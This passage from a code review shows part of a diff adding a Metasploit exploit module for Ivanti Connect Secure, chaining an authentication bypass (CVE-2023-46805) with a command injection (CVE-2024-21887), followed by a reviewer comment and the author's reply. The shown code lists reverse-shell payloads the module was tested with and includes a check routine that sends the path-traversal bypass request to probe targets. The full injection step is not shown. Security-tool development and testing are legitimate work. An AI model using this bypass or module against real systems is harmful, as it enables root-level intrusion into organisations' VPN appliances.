modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb

```diff
@@ -0,0 +1,123 @@
+          22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are
+          also vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF Exploit & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2023-46805'], # The auth bypass vulnerability.
+          ['CVE', '2024-21887'], # The command injection vulnerability.
+          ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],
+          ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']
+        ],
+        'DisclosureDate' => '2024-01-10',
+        'Platform' => %w[linux unix],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true, # Code execution as root.
+        'Targets' => [
+          [
+            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+            # cmd/linux/http/x64/meterpreter/reverse_tcp
+            # cmd/linux/http/x64/shell/reverse_tcp
+            # cmd/linux/http/x86/shell/reverse_tcp
+            'Linux Command',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_CMD]
+            },
+          ],
+          [
+            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+            # cmd/unix/python/meterpreter/reverse_tcp
+            # cmd/unix/reverse_bash
+            # cmd/unix/reverse_python
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD]
+            },
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve
+    # the target system version information. If this requests succeeds, the target is vulnerable.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    # If the vendor mitigation has been applied, the request will return 403 Forbidden.
+    return CheckCode::Safe if res.code != 200
+
+    # By here we know the target is vulnerable, we can pull out the exact version information from the response, this
+    # is only for display purposes, we don't need to test the version information.
+
+    begin
+      json_data = JSON.parse(res.body)
```

Comment:
`get_json_document` may be a better option

Reply:
I implemented this suggestion via [de6ed9e](https://github.com/rapid7/metasploit-framework/pull/18708/commits/de6ed9e1d6e39593582369083c6f7678c7d89262)